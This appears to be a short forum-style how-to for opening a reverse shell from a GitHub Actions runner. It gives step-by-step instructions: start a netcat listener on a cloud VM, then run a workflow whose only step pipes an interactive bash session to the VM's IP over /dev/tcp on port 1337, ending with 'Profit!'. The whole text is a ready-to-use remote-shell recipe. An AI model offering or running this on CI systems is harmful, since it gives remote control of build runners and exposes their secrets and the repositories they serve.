Getting a shell on a GH runner is pretty easy. First, create a linux VM in your favorite cloud provider. Be sure to allow inbound traffic on port 22 and 1337. SSH into that VM and execute the following command:
nc -nvlp 1337
Then run the following workflow in GH actions:
name: Reverse shell
on:
workflow_dispatch:
jobs:
shell:
runs-on: ubuntu-latest
steps:
- name: Shell
run: bash -i >& /dev/tcp/<YOUR-VM-IP-ADDRESS>/1337 0>&1
Profit!